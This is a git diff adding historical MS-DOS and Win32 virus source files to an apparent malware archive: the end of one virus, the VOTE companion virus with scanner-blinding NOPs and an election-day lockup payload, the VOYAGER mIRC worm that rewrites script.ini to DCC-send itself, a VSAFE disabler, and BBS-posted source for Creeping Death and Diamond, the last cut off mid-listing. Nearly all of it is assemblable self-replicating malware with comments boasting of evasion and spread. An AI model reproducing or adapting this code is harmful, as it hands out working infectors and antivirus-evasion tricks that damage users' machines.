mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + retn +sub_2 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + push bp + mov bp,sp + push ds + mov ax,4301h + mov dx,data_36 + mov ds,data_35 + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jnc $+8 ; Jump if carry=0 + pop ds + pop bp + pop ax + jmp loc_43 +sub_4 endp + + db 36h, 8Bh, 5Eh, 04h,0B8h, 00h + db 3Eh,0CDh, 21h,0B8h, 02h, 3Dh + db 0FAh, 9Ch, 2Eh,0FFh, 1Eh,0C2h + db 01h, 1Fh, 36h, 89h, 46h, 04h + db 5Dh,0C3h +data_37 db 3 + db 0BBh,0F7h, 76h +data_38 dw 0BB9Ah +data_39 dw 0BBBBh +data_40 dw 0BBBBh + db 10 dup (0BBh) +data_42 dw 0BBBBh +data_43 dw 0BBBBh +data_44 dw 0BBBBh + db 1574 dup (0BBh) + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.vote.asm b/MSDOS/Virus.MSDOS.Unknown.vote.asm new file mode 100644 index 00000000..b980ea6c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vote.asm @@ -0,0 +1,319 @@ +;**************************************************************************** +;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7. +;* +;* TASM/MASM compatible source listing +;* +;* VOTE, SHITHEAD is a resident, companion virus based upon Little +;* Brother code and library .asm routines extracted from Nowhere Man's VCL. +;* It is also 'patched' with three 'nops' (they are commented) which +;* effectively blind a number of a-v scanners. This simple alteration +;* demonstrates a practical benefit of source code possession: quick +;* generation of different virus strains becomes a task within anyone's +;* reach. The only tools needed are a number of virus scanners and patience. +;* +;* In any case, the VOTE virus is just the ideal sample needed for +;* judicious virus action. It is a PERFECT tool for viral spreading for +;* a number of reasons. First, it is a FAST infector. Once resident +;* VOTE will create a companion file for ANY .EXE executed on ANY drive +;* and it will do it so quickly that most users, even suspicious ones, +;* will not notice any slowdown or glitches in machine operation. +;* Second, 'companion-ed' .EXE's will continue to load and function +;* properly when VOTE is resident. At the start of the day's computing, +;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus +;* becomes resident. If it is re-called it will function perfectly. +;* Third, VOTE like the INSUFF viruses in the last newsletter strikes +;* directly at anti-virus suites vulnerable to 'spawning' infections (many +;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement +;* over the original virus's modus operandi which left them out in plane +;* sight in the directory. Last, VOTE is very small. In RAM, it is not +;* discernible, taking up slightly less that 0.25k. Characteristically, +;* this is NOT reported by a mem /c display. In fact, +;* VOTE is almost invisible to any number of standard diagnostic +;* tests. Memory maps by QEMM and Norton's SYSINFO will +;* report INT 21 hooked differently. But unless the user can compare +;* an uncontaminated INTERRUPT report with one when the virus IS present, +;* it's unlikely he'll know anything is different. Even then, VOTE is hard +;* to notice. +;* +;* On election day, November 3rd, VOTE will lock an infected machine into +;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively +;* across the monitor. Computing will be impossible on Nov. 3rd +;* unless VOTE is removed from the machine, a task accomplished by unmasking +;* all the hidden .COMfiles and deleting them while +;* the virus is NOT resident. At all other times, VOTE is almost completely +;* transparent. +;**************************************************************************** + +code segment + assume cs:code,ds:code,es:nothing + + .RADIX 16 + + +oi21 equ endit +nameptr equ endit+4 +DTA equ endit+8 + + +;**************************************************************************** +;* Check for activation date, then proceed to installation! +;**************************************************************************** + + org 100h + +begin: + call get_day ; Get the day, DOS time/date grab + cmp ax,0003h ; Did the function return the 3rd? + jne realstrt ; If equal, continue along stream + call get_month ; Get the month, DOS time/date grab + cmp ax,000Bh ; Did the function return November (11)? + jne realstrt ; If equal, continue to blooie; if not + ; skip to loading of virus + + +blooie: mov dx, offset shithead ;load 'shithead' message + mov ah,9 ;display it and loop + int 21h ;endlessly until + jmp blooie ;user becomes ill and reboots + +realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM + nop ;a 'nop' to confuse tbSCAN + mov es,ax + nop ;a 'nop' to confuse Datatechnik's AVscan + mov di,0100h + mov si,di + mov cx,endit - begin ;length of SHITHEAD into cx + rep movsb + + mov ds,cx ;get original int21 vector + mov si,0084h + mov di,offset oi21 + mov dx,offset ni21 + lodsw + cmp ax,dx ;check to see if virus is around + je cancel ; by comparing new interrupt (ni21) + stosw ; vector to current, if it looks + movsw ; the same 'cancel' operation + + push es ;set vector to new handler + pop ds + mov ax,2521h + int 21h + +cancel: ret + + +;**************************************************************************** +;* File-extension masks for checking and naming routines;message text +;**************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 +SHITHEAD db "DID YOU VOTE, SHITHEAD??" + db 07h,07h,'$' + +;**************************************************************************** +;* Interrupt handler 24 +;**************************************************************************** + +ni24: mov al,03 ;virus critical error handler + iret ;prevents embarrassing messages + ;on attempted writes to protected disks + +;**************************************************************************** +;* Interrupt handler 21 +;**************************************************************************** + +ni21: pushf + + push es + push ds + push ax + push bx + push dx + + cmp ax,4B00h ;now that we're installed + jne exit ; check for 4B00, DOS excutions + +doit: call infect ; if one comes by, grab it + +exit: pop dx ; if anything else, goto sleep + pop bx + pop ax + pop ds + pop es + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + + +;**************************************************************************** +;* Try to infect a file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the filename + mov word ptr cs:[nameptr+2],ds + + mov ah,2Fh ;get old DTA + int 21 + push es + push bx + + push cs ;set new DTA + + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint ; here's where we grab a name + push di ; for ourselves + mov si,offset COM_txt ;is extension 'COM'? + + mov cx,3 + rep cmpsb + pop di + jz do_com ;if so, go to our .COM routine + + mov si,offset EXE_txt ;is extension 'EXE'? + nop ;'nop' to confuse SCAN v85b. + mov cl,3 + rep cmpsb + jnz return + +do_exe: mov si,offset COM_txt ;change extension to COM + nop ;another 'nop' to confuse SCAN + call change_ext + + mov ax,3300h ;get ctrl-break flag + nop + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vector to new handler + pop ds ;virus handles machine + mov dx,offset ni24 ;exits on attempted writes + mov ah,25h ;to write-protected disks + push ax + int 21 + + lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target) + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h ; makes it hidden/system/read-only + ; do it + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,endit - begin ; write the virus to the created file + mov dx,offset begin ; CX contains length + mov ah,40h ; write to file function + int 21 + + mov ah,3Eh ;close the file + int 21 + + +return1: pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext ;execute EXE-file + +return: mov ah,1Ah ;restore old DTA + pop dx + pop ds + int 21 + + ret + +do_com: call findfirst ;is the COM-file a virus? + cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length + jne return ;no, so execute COM-file + mov si,offset EXE_txt ;does the EXE-variant exist? + call change_ext + call findfirst + jnc return ;yes, execute EXE-file + mov si,offset COM_txt ;change extension to COM + call change_ext + jmp short return ;execute COM-file + +;**************************************************************************** +;* Search beginning of extension for name we will usurp +;**************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,0 + repnz scasb + sub di,4 + ret + +;**************************************************************************** +;* Change the extension of the filename (CS:SI -> ext) +;**************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + + +;**************************************************************************** +;* Find the file +;**************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + +;**************************************************************************** +;* Get the day off the system for activation checking +;**************************************************************************** +get_day: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller +;************************************************************************* +;* Get the month off the system for activation checking +;************************************************************************* + +get_month: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dh ; Copy month into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller + + +endit: + +code ends + end begin + diff --git a/MSDOS/Virus.MSDOS.Unknown.voyager.asm b/MSDOS/Virus.MSDOS.Unknown.voyager.asm new file mode 100644 index 00000000..3b2ce20d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.voyager.asm @@ -0,0 +1,214 @@ + +; +; VOYAGER.mIRC.Worm.Win32 +; by Bumblebee/[Hail and Kill] +; +; . This is a simple mIRC worm. Creates -if not exists- a directory +; called 'C:\Temp' and stores there 'Voyager.exe'. Then searches for +; mIRC in 'c:\mirc' and 'c:\mirc32'. If mIRC is found then deletes +; the 'script.ini' and writes its own script. +; +; . Sets to 'Voyager.exe' read-only and hidden attributes. +; . ExitWindows if Voyager is executed in payload date. +; +; . Is a Win32 program -only uses API- and due to this it must work +; fine under Win95/Win98/WinNT. Is small but -fucking windows- its +; size is 4096 bytes long. +; +; tasm /ml /m3 v32,,; +; tlink32 -Tpe -c v32,v32,, import32.lib +; + +.386 +locals +jumps +.model flat,STDCALL + + ; procs to import + extrn CreateFileA:PROC + extrn WriteFile:PROC + extrn CloseHandle:PROC + extrn DeleteFileA:PROC + extrn ExitProcess:PROC + extrn GetCommandLineA:PROC + extrn GetCurrentDirectoryA:PROC + extrn SetCurrentDirectoryA:PROC + extrn CreateDirectoryA:PROC + extrn VirtualAlloc:PROC + extrn CopyFileA:PROC + extrn SetFileAttributesA:PROC + extrn GetSystemTime:PROC + extrn ExitWindowsEx:PROC + +virusSize equ 4096 +scriptSize equ endScript-mIRCScript + +.DATA + db 0dh,0ah +id db 'VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill]',0 + db 0dh,0ah + +scriptName db 'Script.ini',0 +virusDir db 'C:\Temp',0 +destVir db 'C:\Temp\Voyager.exe',0 +mIRCScript db '[SCRIPT]',0,0dh,0ah + db 'n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32' + db ' by Bumblebee/[Hail and Kill] at your service!',0 + db 0dh,0ah + db 'n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!',0 + db 0dh,0ah + db 'n2=on 1:FILESENT:*.*:/if ( $me != $nick ) { /dcc send' + db ' $nick c:\temp\voyager.exe }',0,0dh,0ah +endScript db 0 + +mIRCDir0 db 'c:\mirc',0 +mIRCDir1 db 'c:\mirc32',0 + +fHnd dd ? +cdirHnd dd ? +commandLine dd ? +size2Read dd 0 + +sysTimeStruct db 16 dup(0) + +.CODE + +inicio: + + call GetCommandLineA ; get command line + mov dword ptr [commandLine],eax + +skipArgs: ; skip args + cmp dword ptr [eax],'EXE.' + je argsOk + inc eax + jmp skipArgs +argsOk: + add eax,4 + mov byte ptr [eax],0 + + push 00000004h ; read/write page + push 00001000h ; mem commit (reserve phys mem) + push 1024 ; size to alloc + push 0h ; let system decide where to alloc + call VirtualAlloc + cmp eax,0 + je goOut ; ops... not memory to alloc? + mov dword ptr [cdirHnd],eax + + push dword ptr [cdirHnd] ; get current directory + push 1024 + call GetCurrentDirectoryA + cmp eax,0 + je goErrOut + +goDir: + lea eax,virusDir + push eax + call SetCurrentDirectoryA + cmp eax,0 + jne skipCreateDir ; directory exists + + xor eax,eax + push 0 + lea eax,virusDir + push eax + call CreateDirectoryA ; create the directory + cmp eax,0 + je goOut + jmp goDir + +skipCreateDir: + + push 0 ; overwrite if exists + lea eax,destVir + push eax + push dword ptr [commandLine] + call CopyFileA ; install Voyager into c:\Temp + cmp eax,0 + je mIRCCheck + + push 00000001h OR 00000002h ; set read only and hidden + lea eax,destVir + push eax + call SetFileAttributesA ; set voyager new attributes + +mIRCCheck: + lea eax,mIRCDir0 + push eax + call SetCurrentDirectoryA + cmp eax,0 + je installScript ; directory exists -> mIRC found! + + lea eax,mIRCDir1 + push eax + call SetCurrentDirectoryA + cmp eax,0 + jne goOut ; directory exists -> mIRC found! + +installScript: + + lea eax,scriptName + push eax ; delete script.ini + call DeleteFileA + + xor eax,eax + push eax + push 00000020h ; archive + push 1 + push eax + push 00000001h OR 00000002h + push 40000000h + lea eax,scriptName + push eax + call CreateFileA ; open new script for write (shared) + cmp eax,-1 + je goOut + + mov dword ptr [fHnd],eax + + push 0 + mov dword ptr [size2Read],0 + lea eax,size2Read + push eax + mov eax,scriptSize + push eax + lea eax,mIRCScript + push eax + push dword ptr [fHnd] + call WriteFile ; write script.ini + + mov eax,dword ptr [fHnd] ; close file + push eax + call CloseHandle + + +goOut: + push dword ptr [cdirHnd] ; restore work directory + call SetCurrentDirectoryA + +goErrOut: + + lea eax,sysTimeStruct ; check for payload + push eax + call GetSystemTime + + lea eax,sysTimeStruct ; 5th day of month? + cmp word ptr [eax+6],5 + jne exitLoop + + xor eax,eax + mov eax,1 + or eax,4 + push eax + push eax + call ExitWindowsEx ; close windows ;) + +exitLoop: + push 0h ; exit + call ExitProcess + jmp exitLoop + +Ends +End inicio + diff --git a/MSDOS/Virus.MSDOS.Unknown.vslay.asm b/MSDOS/Virus.MSDOS.Unknown.vslay.asm new file mode 100644 index 00000000..150873df --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vslay.asm @@ -0,0 +1,19 @@ +;VSLAY - simple de-install Microsoft Antivirus VSAFE +;demonstration code for Crypt Newsletter 16 + + code segment + assume cs:code, ds:code, es:code, ss:nothing + + org 100h + +begin: call vslay + + +vslay: + mov ax,64001 ;wakes up VSAFE to keyboard input + mov dx,5945h ;asks VSAFE to de-install + int 16h ;calls VSAFE-hooked interrupt: keyboard + ret ;exit + + code ends + end begin diff --git a/MSDOS/Virus.MSDOS.Unknown.vsource.asm b/MSDOS/Virus.MSDOS.Unknown.vsource.asm new file mode 100644 index 00000000..fa25dd6c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vsource.asm @@ -0,0 +1,1992 @@ +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3544 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- +; Creeping Death V 1.0 +; +; (C) Copyright 1991 by VirusSoft Corp. + +i13org = 5f8h +i21org = 5fch + + org 100h + + mov sp,600h + inc counter + xor cx,cx + mov ds,cx + lds ax,[0c1h] + add ax,21h + push ds + push ax + mov ah,30h + call jump + cmp al,4 + sbb si,si + mov drive+2,byte ptr -1 + mov bx,60h + mov ah,4ah + call jump + + mov ah,52h + call jump + push es:[bx-2] + lds bx,es:[bx] + +search: mov ax,[bx+si+15h] + cmp ax,70h + jne next + xchg ax,cx + mov [bx+si+18h],byte ptr -1 + mov di,[bx+si+13h] + mov [bx+si+13h],offset header + mov [bx+si+15h],cs +next: lds bx,[bx+si+19h] + cmp bx,-1 + jne search + jcxz install + + pop ds + mov ax,ds + add ax,[3] + inc ax + mov dx,cs + dec dx + cmp ax,dx + jne no_boot + add [3],61h +no_boot: mov ds,dx + mov [1],8 + + mov ds,cx + les ax,[di+6] + mov cs:str_block,ax + mov cs:int_block,es + + cld + mov si,1 +scan: dec si + lodsw + cmp ax,1effh + jne scan + mov ax,2cah + cmp [si+4],ax + je right + cmp [si+5],ax + jne scan +right: lodsw + push cs + pop es + mov di,offset modify+1 + stosw + xchg ax,si + mov di,offset i13org + cli + movsw + movsw + + mov dx,0c000h +fdsk1: mov ds,dx + xor si,si + lodsw + cmp ax,0aa55h + jne fdsk4 + cbw + lodsb + mov cl,9 + sal ax,cl +fdsk2: cmp [si],6c7h + jne fdsk3 + cmp [si+2],4ch + jne fdsk3 + push dx +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3545 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- + push [si+4] + jmp short death +install: int 20h +file: db "c:",255,0 +fdsk3: inc si + cmp si,ax + jb fdsk2 +fdsk4: inc dx + cmp dh,0f0h + jb fdsk1 + + sub sp,4 +death: push cs + pop ds + mov bx,[2ch] + mov es,bx + mov ah,49h + call jump + xor ax,ax + test bx,bx + jz boot + mov di,1 +seek: dec di + scasw + jne seek + lea si,[di+2] + jmp short exec +boot: mov es,[16h] + mov bx,es:[16h] + dec bx + xor si,si +exec: push bx + mov bx,offset param + mov [bx+4],cs + mov [bx+8],cs + mov [bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh + mov dx,offset file + call jump + pop dx + + mov ax,4b00h + call jump + mov ah,4dh + call jump + mov ah,4ch + +jump: pushf + call dword ptr cs:[i21org] + ret + + +;--------Installation complete + +i13pr: mov ah,3 + jmp dword ptr cs:[i13org] + + +main: push ax ; driver + push cx ; strategy block + push dx + push ds + push si + push di + + push es + pop ds + mov al,[bx+2] + + cmp al,4 ; Input + je input + cmp al,8 + je output + cmp al,9 + je output + + call in + cmp al,2 ; Build BPB + jne ppp ; + lds si,[bx+12h] + mov di,offset bpb_buf + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es + push cs + pop es + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3546 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,[di+2-32] + cmp al,2 + adc al,0 + cbw + cmp [di+8-32],0 + je m32 + sub [di+8-32],ax + jmp short ppp +m32: sub [di+15h-32],ax + sbb [di+17h-32],0 + +ppp: pop di + pop si + pop ds + pop dx + pop cx + pop ax +rts: retf + +output: mov cx,0ff09h + call check + jz inf_sec + call in + jmp short inf_dsk + +inf_sec: jmp _inf_sec +read: jmp _read +read_: add sp,16 + jmp short ppp + +input: call check + jz read +inf_dsk: mov byte ptr [bx+2],4 + cld + lea si,[bx+0eh] + mov cx,8 +save: lodsw + push ax + loop save + mov [bx+14h],1 + call driver + jnz read_ + mov byte ptr [bx+2],2 + call in + lds si,[bx+12h] + mov ax,[si+6] + add ax,15 + mov cl,4 + shr ax,cl + mov di,[si+0bh] + add di,di + stc + adc di,ax + push di + cwd + mov ax,[si+8] + test ax,ax + jnz more + mov ax,[si+15h] + mov dx,[si+17h] +more: xor cx,cx + sub ax,di + sbb dx,cx + mov cl,[si+2] + div cx + cmp cl,2 + sbb ax,-1 + push ax + call convert + mov byte ptr es:[bx+2],4 + mov es:[bx+14h],ax + call driver +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl + adc dx,ax + mov cs:gad+1,dx + cmp cl,1 + je small + mov ax,[si] + and ax,di + cmp ax,0fff7h + je bad + cmp ax,0ff7h + je bad + cmp ax,0ff70h + jne ok +bad: pop ax + dec ax + push ax + call convert + jmp short again + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3547 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- +small: not di + and [si],di + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or [si],ax + pop ax + call convert + mov si,es:[bx+0eh] + add si,dx + mov ax,[si] + and ax,di +ok: mov dx,di + dec dx + and dx,di + not di + and [si],di + or [si],dx + + cmp ax,dx + pop ax + pop di + mov cs:pointer+1,ax + je _read_ + mov dx,[si] + push ds + push si + call write + pop si + pop ds + jnz _read_ + call driver + cmp [si],dx + jne _read_ + dec ax + dec ax + mul cx + add ax,di + adc dx,0 + push es + pop ds + mov [bx+12h],2 + mov [bx+14h],ax + test dx,dx + jz less + mov [bx+14h],-1 + mov [bx+1ah],ax + mov [bx+1ch],dx +less: mov [bx+10h],cs + mov [bx+0eh],100h + call write + +_read_: std + lea di,[bx+1ch] + mov cx,8 +load: pop ax + stosw + loop load +_read: call in + + mov cx,9 +_inf_sec: + mov di,es:[bx+12h] + lds si,es:[bx+0eh] + sal di,cl + xor cl,cl + add di,si + xor dl,dl + push ds + push si + call find + jcxz no_inf + call write + and es:[bx+4],byte ptr 07fh +no_inf: pop si + pop ds + inc dx + call find + jmp ppp + +;--------Subroutines + +find: mov ax,[si+8] + cmp ax,"XE" + jne com + cmp [si+10],al + je found +com: cmp ax,"OC" + jne go_on + cmp byte ptr [si+10],"M" + jne go_on + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3548 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- +found: test [si+1eh],0ffc0h ; >4MB + jnz go_on + test [si+1dh],03ff8h ; <2048B + jz go_on + test [si+0bh],byte ptr 1ch + jnz go_on + test dl,dl + jnz rest +pointer: mov ax,1234h + cmp ax,[si+1ah] + je go_on + xchg ax,[si+1ah] +gad: xor ax,1234h + mov [si+14h],ax + loop go_on +rest: xor ax,ax + xchg ax,[si+14h] + xor ax,cs:gad+1 + mov [si+1ah],ax +go_on: ;rol cs:gad+1,1 + db 2eh,0d1h,6 + dw offset gad+1 + add si,32 + cmp di,si + jne find + ret + +check: mov ah,[bx+1] +drive: cmp ah,-1 + mov cs:[drive+2],ah + jne changed + push [bx+0eh] + mov byte ptr [bx+2],1 + call in + cmp byte ptr [bx+0eh],1 + pop [bx+0eh] + mov [bx+2],al +changed: ret + +write: cmp byte ptr es:[bx+2],8 + jae in + mov byte ptr es:[bx+2],4 + mov si,70h + mov ds,si +modify: mov si,1234h + push [si] + push [si+2] + mov [si],offset i13pr + mov [si+2],cs + call in + pop [si+2] + pop [si] + ret + +driver: mov es:[bx+12h],1 +in: + db 09ah +str_block: + dw ?,70h + db 09ah +int_block: + dw ?,70h + test es:[bx+4],byte ptr 80h + ret + +convert: cmp ax,0ff0h + jae fat_16 + mov si,3 + xor cs:[si+gad-1],si + mul si + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si +header: inc ax + ret + +counter: dw 0 + + dw 842h + dw offset main + dw offset rts + db 7fh + +param: dw 0,80h,?,5ch,?,6ch,? + +bpb_buf: db 32 dup(?) +f_name: db 80 dup(?) + +;--------The End. + + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3549 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3550 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- +; The Diamond Virus +; +; Version 2.10 +; +; also known as: +; V1024, V651, The EGN Virus +; +; Basic release: 5-Aug-1989 +; Last patch: 5-May-1990 +; +; COPYRIGHT: +; +; This program is (c) Copyright 1989,1990 Damage, Inc. +; Permission is granted to distribute this source provided the tittle +page is +; preserved. +; Any fee can be charged for distribution of this source, however, +Damage, Inc. +; distributes it freely. +; You are specially prohibited to use this program for military +purposes. +; Damage, Inc. is not liable for any kind of damages resulting from +the use of +; or the inability to use this software. +; +; To assemble this program use Turbo Assembler 1.0 + + .radix 16 + .model tiny + .code +code_len = top_code-main_entry +data_len = top_data-top_code +main_entry: + call locate_address +gen_count dw 0 +locate_address: + xchg ax,bp + cld + pop bx + inc word ptr cs:[bx] + mov ax,0d5aa + int 21 + cmp ax,2a03 + jz all_done + mov ax,sp + inc ax + mov cl,4 + shr ax,cl + inc ax + mov dx,ss + add ax,dx + mov dx,ds + dec dx + mov es,dx + xor di,di + mov cx,(top_data-main_entry-1)/10+1 + mov dx,[di+2] + sub dx,cx + cmp dx,ax + jc all_done + cli + sub es:[di+3],cx + mov [di+2],dx + mov es,dx + lea si,[bx+main_entry-gen_count] + mov cx,top_code-main_entry + rep + db 2e + movsb + push ds + mov ds,cx + mov si,20 + lea di,[di+old_vector-top_code] + org $-1 + mov ax,offset dos_handler + xchg ax,[si+64] + stosw + mov ax,es + xchg ax,[si+66] + stosw + mov ax,offset time_handler + xchg ax,[si] + stosw + xchg ax,dx + xchg ax,[si+2] + stosw + mov ax,24 + stosw + pop ds + push ds + pop es + sti +all_done: + lea si,[bx+exe_header-gen_count] + db 2e + lodsw + cmp ax,'ZM' + jz exit_exe +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3551 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- + mov di,100 + push di + stosw + movsb + xchg ax,bp + ret +exit_exe: + mov dx,ds + add dx,10 + add cs:[si+return_address+2-exe_header-2],dx + org $-1 + add dx,cs:[si+stack_offset+2-exe_header-2] + org $-1 + mov ss,dx + mov sp,cs:[si+stack_offset-exe_header-2] + org $-1 + xchg ax,bp + jmp dword ptr +cs:[si+return_address-exe_header-2] + org $-1 +infect: + mov dx,offset exe_header + mov cx,top_header-exe_header + mov ah,3f + int 21 + jc do_exit + sub cx,ax + jnz go_error + mov di,offset exe_header + les ax,[di+ss_offset-exe_header] + org $-1 + mov [di+stack_offset-exe_header],es + org $-1 + mov [di+stack_offset+2-exe_header],ax + org $-1 + les ax,[di+ip_offset-exe_header] + org $-1 + mov [di+return_address-exe_header],ax + org $-1 + mov [di+return_address+2-exe_header],es + org $-1 + mov dx,cx + mov ax,4202 + int 21 + jc do_exit + mov [di+file_size-exe_header],ax + org $-1 + mov [di+file_size+2-exe_header],dx + org $-1 + mov cx,code_len + cmp ax,cx + sbb dx,0 + jc do_exit + xor dx,dx + mov si,'ZM' + cmp si,[di] + jz do_put_image + cmp [di],'MZ' + jz do_put_image + cmp ax,0fe00-code_len + jc put_image +go_error: + stc +do_exit: + ret +do_put_image: + cmp dx,[di+max_size-exe_header] + org $-1 + jz go_error + mov [di],si +put_image: + mov ah,40 + int 21 + jc do_exit + sub cx,ax + jnz go_error + mov dx,cx + mov ax,4200 + int 21 + jc do_exit + mov ax,[di+file_size-exe_header] + org $-1 + cmp [di],'ZM' + jnz com_file + mov dx,[di+file_size-exe_header+2] + org $-1 + mov cx,4 + push di + mov si,[di+header_size-exe_header] + org $-1 + xor di,di +shift_size: + shl si,1 + rcl di,1 + loop shift_size + sub ax,si + sbb dx,di + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3552 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- + pop di + mov cl,0c + shl dx,cl + mov [di+ip_offset-exe_header],ax + org $-1 + mov [di+cs_offset-exe_header],dx + org $-1 + add dx,(code_len+data_len+100-1)/10+1 + org $-1 + mov [di+sp_offset-exe_header],ax + org $-1 + mov [di+ss_offset-exe_header],dx + org $-1 + add word ptr +[di+min_size-exe_header],(data_len+100-1)/10+1 + org $-2 + mov ax,[di+min_size-exe_header] + org $-1 + cmp ax,[di+max_size-exe_header] + org $-1 + jc adjust_size + mov [di+max_size-exe_header],ax + org $-1 +adjust_size: + mov ax,[di+last_page-exe_header] + org $-1 + add ax,code_len + push ax + and ah,1 + mov [di+last_page-exe_header],ax + org $-1 + pop ax + mov cl,9 + shr ax,cl + add [di+page_count-exe_header],ax + org $-1 + jmp short put_header +com_file: + sub ax,3 + mov byte ptr [di],0e9 + mov [di+1],ax +put_header: + mov dx,offset exe_header + mov cx,top_header-exe_header + mov ah,40 + int 21 + jc error + cmp ax,cx + jz reset +error: + stc +reset: + ret +find_file: + pushf + push cs + call calldos + test al,al + jnz cant_find + push ax + push bx + push es + mov ah,51 + int 21 + mov es,bx + cmp bx,es:[16] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2f + int 21 + pop ax + inc al + jnz fcb_standard + add bx,7 +fcb_standard: + mov ax,es:[bx+17] + and ax,1f + xor al,1e + jnz not_infected + and byte ptr es:[bx+17],0e0 + sub es:[bx+1dh],code_len + sbb es:[bx+1f],ax +not_infected: + pop es + pop bx + pop ax +cant_find: + iret +dos_handler: + cmp ah,4bh + jz exec + cmp ah,11 + jz find_file + cmp ah,12 + jz find_file + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3553 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- + cmp ax,0d5aa + jnz calldos + not ax +fail: + mov al,3 + iret +exec: + cmp al,2 + jnc calldos + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + mov ax,3524 + int 21 + push es + push bx + mov ah,25 + push ax + push ds + push dx + push cs + pop ds + mov dx,offset fail + int 21 + pop dx + pop ds + mov ax,4300 + int 21 + jc exit + test cl,1 + jz open + dec cx + mov ax,4301 + int 21 +open: + mov ax,3d02 + int 21 + jc exit + xchg ax,bx + mov ax,5700 + int 21 + jc close + mov al,cl + or cl,1f + dec cx + xor al,cl + jz close + push cs + pop ds + push cx + push dx + call infect + pop dx + pop cx + jc close + mov ax,5701 + int 21 +close: + mov ah,3e + int 21 +exit: + pop ax + pop dx + pop ds + int 21 + pop di + pop si + pop dx + pop cx + pop bx + pop 